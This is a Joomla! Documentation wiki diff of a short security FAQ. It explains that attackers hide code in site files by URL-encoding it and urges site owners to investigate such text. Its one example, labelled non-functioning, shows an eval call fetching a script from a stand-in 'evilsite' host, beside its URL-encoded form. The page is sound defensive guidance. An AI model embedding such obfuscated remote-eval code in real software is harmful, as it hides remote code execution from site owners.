Difference between revisions of "What are these strange (URL-Encoded) characters doing in your code?"

From Joomla! Documentation

m (eliminate repeating the title and table markup into wikitable markup)
 
Line 1: Line 1:
== What are these strange (URL-Encoded) characters doing in my code? ==
+
== Overview ==
 
 
Overview
 
  
 
Attackers sometimes hide code away from prying eyes by URL Encoding it.
 
Attackers sometimes hide code away from prying eyes by URL Encoding it.
Line 11: Line 9:
 
Here are some trivial, non-functioning examples of URL Encoded text:
 
Here are some trivial, non-functioning examples of URL Encoded text:
  
<table border="1">
+
{| class="wikitable"
<tr>
+
!Original
<th>Original</th>
+
!URL Encoded
<th>URL Encoded</th>
+
|-
</tr>
+
|this line has spaces  
<tr valign="top">
+
|this%20line%20has%20spaces
<td>this line has spaces</td>
+
|-
<td>this%20line%20has%20spaces</td>
+
|eval(evil_script(http://www.evilsite/?evilscript.pl"));  
</tr>
+
|%65val%28%65%76il_%73cri%70t<br/>
<tr valign="top">
+
%28%68tt%70%3A//%77%77%77.%65%76il%73ite/%3F%65%76il%73<br/>
<td>eval(evil_script(http://www.evilsite/?evilscript.pl"));</td>
+
cript.%70l%22%29%29%3B
<td>%65val%28%65%76il_%73cri%70t
+
|}
%28%68tt%70%3A//%77%77%77.
 
%65%76il%73ite/%3F%65%76il%73
 
cript.%70l%22%29%29%3B</td>
 
</tr>
 
</table>
 
  
 
'''Resources'''
 
'''Resources'''

Latest revision as of 16:06, 17 October 2012

Overview[edit]

Attackers sometimes hide code away from prying eyes by URL Encoding it.

The purpose of URL Encoding is to allow non-URL compatible characters to be passed via the URL. There are many legitimate reasons for doing this, such as hiding email from spammers, dealing with spaces in file names. etc.

However, if you find odd, URL-encoded text in your site's files, you should investigate immediately. URL encoded text is very easy to translate using PHP, javascript, or one of the many free, online translators.

Here are some trivial, non-functioning examples of URL Encoded text:

Original URL Encoded
this line has spaces this%20line%20has%20spaces
eval(evil_script(http://www.evilsite/?evilscript.pl")); %65val%28%65%76il_%73cri%70t

%28%68tt%70%3A//%77%77%77.%65%76il%73ite/%3F%65%76il%73
cript.%70l%22%29%29%3B

Resources

  1. Text Unescape Utility
  2. HTML URL-encoding Reference